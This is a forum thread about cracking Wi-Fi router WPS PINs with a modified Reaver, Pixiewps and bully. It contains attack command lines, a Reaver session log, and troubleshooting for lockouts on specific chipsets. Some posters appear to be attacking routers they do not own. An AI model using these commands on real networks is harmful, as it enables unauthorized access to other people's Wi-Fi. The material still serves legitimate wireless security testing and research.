Ah, I think I passed right over that, thanks. I'm moving over to the original pixie dust thread because this doesn't really pertain to Reaver...
There is already a new update on GitHub.
I was already using the new pixiewps. Wiire had upgraded reaver to work, and now I have made some adjustments to make it a little more automated.
I improved the code too.
There is already a new update on GitHub.
Bug fixes
Hey,
I tried to test forked reaver & Pixiewps on the supposedly invulnerable "D-Link RTL 8671 EV 2006 27 07 (Realtek)".
1. Used reaver -i mon0 - bssid -v -K 1 (didn't use -S, as it's a Realtek chip)
got all the arguments for pixiewps
Result Found as...
a. No WPS pin found
b. WPS Pin= 12345670 (When used -f argument with pixiewps)
2. Now tried to use WPS Generator
3 pins were spat out. When I tried to use them to find the passphrase, Reaver never proceeded further.
Which pin is correct? When I use --pin in reaver, Reaver just gets stuck in loops and then gets locked out after 10 tries.
https://forums.kali.org/showthread.p...t-Attack/page5
Read page 5 for the pin generator.
Thanks for the reply :) Got the logic. Apparently none of the 3 pins was correct. All tries led to lockout. PixieWPS is also not working on the RTL8671. The normal Reaver attack stops at the 11th pin, and after that "25 Successive Start Failures". Is the RTL8671 un-hackable? **I am going to lose the bet** :(
The RTL8671 is certainly different. It is a SoC (System on Chip), which means pretty much everything is done on that chip... different than your average AP. SoCs are generally found in DSL+Cable+Fiber/Router combo devices, which leads me to think that they use a different PRNG.
The good news: When I first noticed the static E-Nonce on Realtek devices it kinda told me that their implementation was insecure. Again, seeing a strange nonce following the XX:XX:00:00 pattern, it leads me to think their implementation here is broken also. Wiire and I are looking at it and if we can't find anything, I'll talk with Dominique Bongard. All great people to work with and I love having the pleasure of being able to :)
--I will move to the Pixie Dust thread since this does not pertain to Reaver
Hi guys,
First, thank you very much for coming up and posting this great idea.
I'm having difficulty with Reaver. Basically, it won't return the E-Nonce, PKE, manufacturer, model number, etc. The output is exactly like "regular" Reaver.
I was looking for posts with the same problem, but haven't found any... which is also weird... What am I doing wrong? I installed Reaver and Pixie exactly like the instructions, and even re-installed just to be sure.
This is the output I get:
Any ideas?
Quote:
> reaver -i wlan1mon -c 6 -b 04:**:**:**:**:** -vv -S
Reaver v1.5.2 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>
mod by t6_x <[email protected]> & DataHead & Soxrok2212 & Wiire & kib0rg
[+] Switching wlan1mon to channel 6
[+] Waiting for beacon from 04:**:**:**:**:**
[+] Associated with 04:**:**:**:**:** (ESSID: *****)
[+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000
[+] Trying pin 12345670.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] p1_index set to 1
[+] Pin count advanced: 1. Max pin attempts: 11000
[+] Trying pin 00005678.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] p1_index set to 2
[+] Pin count advanced: 2. Max pin attempts: 11000
^C
[+] Session saved.
Thanks!
On some Technicolor devices the modified reaver recovers the pin but not the passphrase; it freezes on:
[+] Running reaver with the correct pin, wait ...
[+] Cmd : reaver -i wlan1mon -b 18:17:25:xx:xx:xx -c 11 -s y -vv -p xxxxxxxx
[Reaver Test] [+] BSSID: 18:17:25:xx:xx:xx
[Reaver Test] [+] Channel: 11
If such a thing happens, use bully to recover it.
Example:
bully -b 18:17:25:xx:xx:xx -c 11 -B -v 2 -p xxxxxxxx
It worked for me.
@Vinit2512 the RTL8671 is hackable (tested)
To soxrok2212
Could you clarify the -vv versus -vvv? We downloaded and installed the latest reaver as of 15 June and we get no difference in output regardless of settings. We get all the Pixiedust data sequences in both cases.
Which variable, i.e. -vv or -vvv, is supposed to provide all data?
MTeams
Hello.
I managed to get 3 pins off 3 different routers, but whenever reaver goes into the second part of the cracking it just hangs at test channel, and when I check airodump the router no longer has WPS enabled/showing, like it turned off when I got the pin.
Is there a way to re-enable it? They were on before I tried reaver on them.
Ported to Android!
Will update soon with link to build script on my github.
Binaries of pixiewps and t6x-reaver.
http://www.mediafire.com/download/bw...android.tar.gz
Having problems with the prereqs
root@kali:~# apt-get install libpcap-dev libssl-dev sqlite3 libsqlite3-dev unzip
Reading package lists... Done
Building dependency tree
Reading state information... Done
libssl-dev is already the newest version.
unzip is already the newest version.
unzip set to manually installed.
sqlite3 is already the newest version.
sqlite3 set to manually installed.
Some packages could not be installed. This may mean that you have
requested an impossible situation or if you are using the unstable
distribution that some required packages have not yet been created
or been moved out of Incoming.
The following information may help to resolve the situation:
The following packages have unmet dependencies:
libpcap-dev : Depends: libpcap0.8-dev but it is not going to be installed
libsqlite3-dev : Depends: libsqlite3-0 (= 3.7.16.2-1~bpo70+1) but 3.8.7.1-1+deb8u1 is to be installed
E: Unable to correct problems, you have held broken packages.
What is force mode?
"Try again with --force or with another (newer) set of data"
And how should I use it?
https://github.com/wiire/pixiewps
Quote:
If the following message is shown:
[!] The AP /might be/ vulnerable. Try again with --force or with another (newer) set of data.
then the AP might be vulnerable and Pixiewps should be run again with the same set of data along with the option --force or alternatively with a newer set of data.
Is anyone familiar with reaver's "wps transaction failed (0x04)"? WPS is not locked but I get this error constantly.
Thanks for the hard work with updating reaver with pixiewps, but I get an error that the WPS pin was not found and it doesn't continue. I run reaver with "reaver -i wlan0mon -b <bssid> -c 11 -K1 -vvv -S" but any combination will produce the same error.
If you use K1, reaver stops after M3 to try pixiewps. If the PIN is not found, launch the attack again without K1 to proceed with the normal WPS brute force.
I have a problem with the installation of reaver 1.5, because when I put ./CONFIGURE, it gives me ERROR: PCAP LIBRARY NOT FOUND. I tried to install updates, but nothing helped.
This command used to work fine for me, but now every time it just repeatedly says, "Failed to associate.....". Did this stop working for anyone else?
Attacking an RTL8xxx, I am getting lots of "failed to associate", "timeout", "AP rate limiting - wait 60 seconds", although the pin count rises very slowly. Pixiewps didn't work; are there switches I can use to speed up the process? The 'estimated time' fluctuates between 1 day and 10-14?